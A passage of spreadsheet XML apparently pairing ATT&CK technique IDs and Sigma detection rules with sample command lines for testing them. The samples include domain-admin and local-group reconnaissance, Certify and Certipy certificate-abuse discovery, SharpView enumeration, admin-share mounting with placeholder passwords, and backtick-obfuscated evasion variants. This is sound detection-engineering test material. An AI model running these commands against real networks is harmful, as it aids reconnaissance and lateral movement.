      <c r="J1588" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1588" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1589" ht="15.75" customHeight="1" s="42">
      <c r="A1589" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1589" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1589" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1589" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1589" s="43" t="inlineStr">
        <is>
          <t>net  group "enterprise\ admins" /domain</t>
        </is>
      </c>
      <c r="F1589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1589" s="43" t="n"/>
      <c r="J1589" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1589" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1590" ht="15.75" customHeight="1" s="42">
      <c r="A1590" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C1590" s="43" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D1590" s="43" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E1590" s="43" t="inlineStr">
        <is>
          <t>net group "domain\ admins" /do /add /delete</t>
        </is>
      </c>
      <c r="F1590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1590" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1590" s="43" t="n"/>
      <c r="J1590" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1590" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1591" ht="15.75" customHeight="1" s="42">
      <c r="A1591" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1591" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1591" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1591" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1591" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-LocalGroupMember -Group 'Administrators' | Where-Object { $_.ObjectClass -eq 'User' } | Select-Object Name"</t>
        </is>
      </c>
      <c r="F1591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1591" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1591" s="43" t="n"/>
      <c r="J1591" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1591" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1592" ht="15.75" customHeight="1" s="42">
      <c r="A1592" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1592" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1592" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1592" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1592" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-LocalGroupMember -Group 'Remote Desktop Users' | Where-Object { $_.ObjectClass -eq 'User' } | Select-Object Name"</t>
        </is>
      </c>
      <c r="F1592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1592" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1592" s="43" t="n"/>
      <c r="J1592" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1592" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1593" ht="15.75" customHeight="1" s="42">
      <c r="A1593" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B1593" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_localgroup_member_recon</t>
        </is>
      </c>
      <c r="C1593" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet</t>
        </is>
      </c>
      <c r="D1593" s="43" t="inlineStr">
        <is>
          <t>c8a180d6-47a3-4345-a609-53f9c3d834fc</t>
        </is>
      </c>
      <c r="E1593" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-LocalGroupMember -Group 'Administrators' | Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -eq 'Local' } | Select-Object Name"</t>
        </is>
      </c>
      <c r="F1593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1593" s="43" t="n"/>
      <c r="J1593" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1593" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1594" ht="15.75" customHeight="1" s="42">
      <c r="A1594" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1594" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1594" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1594" s="43" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1594" s="43" t="inlineStr">
        <is>
          <t>Certify.exe find /vulnerable /domain:internal.corp /path:C:\Temp\</t>
        </is>
      </c>
      <c r="F1594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1594" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1594" s="43" t="n"/>
      <c r="J1594" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1594" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1595" ht="15.75" customHeight="1" s="42">
      <c r="A1595" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1595" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1595" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1595" s="43" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1595" s="43" t="inlineStr">
        <is>
          <t>Certify.exe find /vulnerable /domain:internal.corp /template:template1</t>
        </is>
      </c>
      <c r="F1595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1595" s="43" t="n"/>
      <c r="J1595" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1595" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1596" ht="15.75" customHeight="1" s="42">
      <c r="A1596" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1596" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1596" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1596" s="43" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1596" s="43" t="inlineStr">
        <is>
          <t>Certify.exe find /vulnerable /domain:internal.corp /altname:altname1</t>
        </is>
      </c>
      <c r="F1596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1596" s="43" t="n"/>
      <c r="J1596" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1596" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1597" ht="15.75" customHeight="1" s="42">
      <c r="A1597" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1597" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1597" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1597" s="43" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1597" s="43" t="inlineStr">
        <is>
          <t>certipy.exe find -u admin -p Password123 -dc-ip 10.10.10.10</t>
        </is>
      </c>
      <c r="F1597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1597" s="43" t="n"/>
      <c r="J1597" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1597" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1598" ht="15.75" customHeight="1" s="42">
      <c r="A1598" s="43" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1598" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1598" s="43" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1598" s="43" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1598" s="43" t="inlineStr">
        <is>
          <t>certipy.exe find -u administrator -p Password123 --dc-ip 10.10.10.10</t>
        </is>
      </c>
      <c r="F1598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1598" s="43" t="n"/>
      <c r="J1598" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1598" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1599" ht="15.75" customHeight="1" s="42">
      <c r="A1599" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1599" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpldapwhoami</t>
        </is>
      </c>
      <c r="C1599" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpLdapWhoami Execution</t>
        </is>
      </c>
      <c r="D1599" s="43" t="inlineStr">
        <is>
          <t>d9367cbb-c2e0-47ce-bdc0-128cb6da898d</t>
        </is>
      </c>
      <c r="E1599" s="43" t="inlineStr">
        <is>
          <t>svchost.exe /method:ntlm --verbose</t>
        </is>
      </c>
      <c r="F1599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1599" s="43" t="n"/>
      <c r="J1599" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1599" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1600" ht="15.75" customHeight="1" s="42">
      <c r="A1600" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1600" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpldapwhoami</t>
        </is>
      </c>
      <c r="C1600" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpLdapWhoami Execution</t>
        </is>
      </c>
      <c r="D1600" s="43" t="inlineStr">
        <is>
          <t>d9367cbb-c2e0-47ce-bdc0-128cb6da898d</t>
        </is>
      </c>
      <c r="E1600" s="43" t="inlineStr">
        <is>
          <t>svchost.exe /m:ntlm /v</t>
        </is>
      </c>
      <c r="F1600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1600" s="43" t="n"/>
      <c r="J1600" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1600" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1601" ht="15.75" customHeight="1" s="42">
      <c r="A1601" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1601" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpldapwhoami</t>
        </is>
      </c>
      <c r="C1601" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpLdapWhoami Execution</t>
        </is>
      </c>
      <c r="D1601" s="43" t="inlineStr">
        <is>
          <t>d9367cbb-c2e0-47ce-bdc0-128cb6da898d</t>
        </is>
      </c>
      <c r="E1601" s="43" t="inlineStr">
        <is>
          <t>svchost.exe /method:ntlm  /verbose</t>
        </is>
      </c>
      <c r="F1601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1601" s="43" t="n"/>
      <c r="J1601" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1601" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1602" ht="15.75" customHeight="1" s="42">
      <c r="A1602" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1602" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpldapwhoami</t>
        </is>
      </c>
      <c r="C1602" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpLdapWhoami Execution</t>
        </is>
      </c>
      <c r="D1602" s="43" t="inlineStr">
        <is>
          <t>d9367cbb-c2e0-47ce-bdc0-128cb6da898d</t>
        </is>
      </c>
      <c r="E1602" s="43" t="inlineStr">
        <is>
          <t>svchost.exe /method:ntlm" /verbose</t>
        </is>
      </c>
      <c r="F1602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1602" s="43" t="n"/>
      <c r="J1602" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1602" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1603" ht="15.75" customHeight="1" s="42">
      <c r="A1603" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1603" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_computer_discovery_get_adcomputer</t>
        </is>
      </c>
      <c r="C1603" s="43" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet</t>
        </is>
      </c>
      <c r="D1603" s="43" t="inlineStr">
        <is>
          <t>435e10e4-992a-4281-96f3-38b11106adde</t>
        </is>
      </c>
      <c r="E1603" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ADComputer -Filter * | Out-File computers.`txt"</t>
        </is>
      </c>
      <c r="F1603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1603" s="43" t="n"/>
      <c r="J1603" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1603" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1604" ht="15.75" customHeight="1" s="42">
      <c r="A1604" s="43" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1604" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_user_discovery_get_aduser</t>
        </is>
      </c>
      <c r="C1604" s="43" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet</t>
        </is>
      </c>
      <c r="D1604" s="43" t="inlineStr">
        <is>
          <t>1114e048-b69c-4f41-bc20-657245ae6e3f</t>
        </is>
      </c>
      <c r="E1604" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-ADUser -Filter * | Export-Csv -Path C:\temp\users.csv -NoTypeInformation"</t>
        </is>
      </c>
      <c r="F1604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1604" s="43" t="n"/>
      <c r="J1604" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1604" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1605" ht="15.75" customHeight="1" s="42">
      <c r="A1605" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1605" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1605" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1605" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1605" s="43" t="inlineStr">
        <is>
          <t>SharpView.exe Get-DomainComputer</t>
        </is>
      </c>
      <c r="F1605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1605" s="43" t="n"/>
      <c r="J1605" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1605" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1606" ht="15.75" customHeight="1" s="42">
      <c r="A1606" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1606" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1606" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1606" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1606" s="43" t="inlineStr">
        <is>
          <t>SharpView.exe Get-DomainComputer`</t>
        </is>
      </c>
      <c r="F1606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1606" s="43" t="n"/>
      <c r="J1606" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1606" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1607" ht="15.75" customHeight="1" s="42">
      <c r="A1607" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1607" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1607" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1607" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1607" s="43" t="inlineStr">
        <is>
          <t>SharpView.exe Get-DomainComputer`n</t>
        </is>
      </c>
      <c r="F1607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1607" s="43" t="n"/>
      <c r="J1607" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1607" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1608" ht="15.75" customHeight="1" s="42">
      <c r="A1608" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1608" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1608" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1608" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1608" s="43" t="inlineStr">
        <is>
          <t>SharpView.exe Get-DomainComputer`r</t>
        </is>
      </c>
      <c r="F1608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1608" s="43" t="n"/>
      <c r="J1608" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1608" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1609" ht="15.75" customHeight="1" s="42">
      <c r="A1609" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1609" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1609" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1609" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1609" s="43" t="inlineStr">
        <is>
          <t>SharpView.exe Get-DomainComputer`r`n</t>
        </is>
      </c>
      <c r="F1609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1609" s="43" t="n"/>
      <c r="J1609" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1609" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1610" ht="15.75" customHeight="1" s="42">
      <c r="A1610" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1610" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1610" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1610" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1610" s="43" t="inlineStr">
        <is>
          <t>SharpView.exe Get-DomainComputer` `</t>
        </is>
      </c>
      <c r="F1610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1610" s="43" t="n"/>
      <c r="J1610" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1610" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1611" ht="15.75" customHeight="1" s="42">
      <c r="A1611" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1611" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1611" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1611" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1611" s="43" t="inlineStr">
        <is>
          <t>net use "\Target\C$" P@ssw0rd1 /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F1611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1611" s="43" t="n"/>
      <c r="J1611" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1611" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1612" ht="15.75" customHeight="1" s="42">
      <c r="A1612" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1612" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1612" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1612" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1612" s="43" t="inlineStr">
        <is>
          <t>net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F1612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1612" s="43" t="n"/>
      <c r="J1612" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1612" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1613" ht="15.75" customHeight="1" s="42">
      <c r="A1613" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1613" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1613" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1613" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1613" s="43" t="inlineStr">
        <is>
          <t>net.exe use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F1613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1613" s="43" t="n"/>
      <c r="J1613" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1613" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1614" ht="15.75" customHeight="1" s="42">
      <c r="A1614" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1614" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1614" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1614" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1614" s="43" t="inlineStr">
        <is>
          <t>net  use  \\Target\C$  P@ssw0rd1  /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F1614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1614" s="43" t="n"/>
      <c r="J1614" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1614" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1615" ht="15.75" customHeight="1" s="42">
      <c r="A1615" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1615" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1615" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1615" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1615" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</t>
        </is>
      </c>
      <c r="F1615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1615" s="43" t="n"/>
      <c r="J1615" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1615" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1616" ht="15.75" customHeight="1" s="42">
      <c r="A1616" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1616" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1616" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1616" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1616" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator"</t>
        </is>
      </c>
      <c r="F1616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1616" s="43" t="b">
        <v>0</v>
      </c>
